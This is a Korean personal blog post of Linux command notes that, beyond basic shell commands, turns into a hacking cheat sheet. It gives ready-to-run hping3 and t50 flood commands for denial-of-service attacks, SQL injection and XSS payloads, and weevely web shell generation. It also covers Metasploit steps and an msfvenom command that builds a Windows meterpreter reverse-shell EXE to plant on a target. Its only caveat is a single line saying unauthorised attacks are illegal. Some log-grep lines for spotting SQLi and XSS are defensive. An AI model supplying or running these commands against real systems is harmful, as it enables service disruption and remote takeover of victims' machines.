리눅스 명령어를 개인적으로 정리하고 있는 게시글입니다.(계속 추가중입니다)
참고하실 분은 참고하세요~
find : 파일 찾기
file : 파일 정보 확인
grep : 문자열 찾기 (-E : 정규식 옵션)
xargs : 입력값으로 넣어주기 ( find . | xargs file)
awk -F '{print $1}' : 필드 분리
cat : 파일 읽기
vi : 파일 편집(i : 파일 편집, w:저장 , q:나가기)
sudo : 현재 계정에서 다른 계정의 권한만 빌려옴
su : 다른 계정으로 전환
su - : 다른 계정으로 전환 및 해당 계정의 환경 변수까지 설정
su -c : 쉘을 실행하지 않고 주어진 명령만 수행
whoami : 현재 사용자를 확인
logout / exit : 전환 전 계정으로 돌아감
history : 명령어 기록 확인
ps : 프로세스 관련 명령어
cd : 현재 위치 이동
pwd : 현재 위치 확인
passwd (사용자) : 비밀번호 변경
보안 관련 명령어
허가되지 않은 공격(아래의 명령어)은 범법행위입니다.
DDOS 공격
hping3 127.0.0.1 --icmp -d 65000 --flood -a 127.0.0.1 : Ping of Death (65000바이트 크기의 ICMP 패킷 전송. 패킷이 분할되어 부하가 급증)
hping3 127.0.0.1 --flood -a 127.0.0.1 : Land Attack ( 발신자와 수신자의 IP주소를 공격 대상으로 하는 공격)
hping3 192.168.85.255 --icmp --flood -a 192.168.85.128 : Smurf Attack
hping3 192.168.85.128 --udo -p 53 -d 1470 --flood : UDP Flooding
hping3 192.168.85.128 -d 1470 --flood -g 200 -rand-source : Tear Drop
hping3 192.168.85.128 -id 3200 -O 12345-M 34343 -p 80 -d 320 --flood -a 1.1.1.1 : Bonk, Boink
hping3 IP -S --flood --rand-source : TCP SYN Flooding(TCP SYN 패킷을 전송하는 공격)
hping3 - DDOS공격
-S : 전송
--flood : 넘치도록
--rand-source : 송신 주소는 랜덤하게
vmstat 초 : 현재 컴퓨터 자원 상태를 초마다 출력 (vmstat 1 > cpu.txt : 현재 컴퓨터 자원을 1초마다 cpu.txt 에 출력)
cat /var/log/apache2/access.log | grep -E "select|union|sqlmap" : SQL INJECTION 확인
cat /var/log/apache2/access.log | grep -E "script|iframe" : XSS 확인
t50 127.0.0.1 --protocol TCP --dport 80 --flood : 서버 강도 테스트 (T50을 사용해서 단순하게 Request 트랜잭션 발생)
1) 정보 획득
1-1) nslookup
nslookup www.naver.com
1-2) nmap -sS 10.0.2.2 : 서비스 알아내기
* 공유폴더 : 135, 445 TCP 실행 중
* 웹서버 : 80번 포트
* ssh : 22번 포트
1-3)사회공학적 기법
ID획득, 비번찾기
1-4) 웹서버 종류, 알려진 취약점
CVE코드확인(www.cvedetails.com)
2) 웹 공격(OWASP)
2-1) SQL Injection
- ' or 1=1 #
2-2) XSS
- <script>alert("TEST");</script>
2-3) Upload : Web Shell(*.php)
- weevley generate 1234 test.php
- Metasploit : Msfconsole
Meterpreter ->
Msfvenom
* Payload : 모듈
* Shellcode : 기계어로 구성된 실행 파일
* exploit : 취약점을 이용한 공격
- find / -name synflood.rb -print
- service postgresql start
- service metaspoit start
- msfconsole (msfconsole 실행) : - msfconsole : vi /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb 에서 20을 2로 수정
use auxiliary/dos/tcp/synflood : synflood 진입
back : 나가기
show options : 설정 확인
set rhost 127.0.0.1 : 공격대상 IP 설정
exploit : 공격 시작
use auxiliary/scanner/smb/smb_version
* 악성코드 생성
use windows/meterpreter/reverse_tcp
set lhost 10.10.10.10
show options
generate -t vba
* 공격자 대기모드(LISTEN 상태로 두기)
use exploit/multi/handler
set payloads windows/meterperter/reverse_tcp
set lhost 10.0.2.15 (공격자의 IP. 의미없는 명령어지만 설정을 안하면 작동X)
* 악성코드(EXE)
msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f exe > tta.exe
윈도우 공유 폴더에 tta.exe 업로드 및 실행하면 listen중이던 handler가 받음
이 때부터 공격대상의 윈도우 조작 가능
'Linux' 카테고리의 다른 글
[Linux] Git 설치하기 (AWS) (0) | 2022.01.12 |
---|---|
[Linux] passwd 변경 시, 암호 변경을 위해 조금 더 기다려 주십시오. 해결 방법 (0) | 2021.12.03 |
[Linux] Vi 편집기에서 문자열 찾기 (0) | 2021.11.16 |
[Linux] 프로젝트 버전 확인 (0) | 2021.09.28 |
[Linux] Linux VPN 사용 방법 (0) | 2021.04.14 |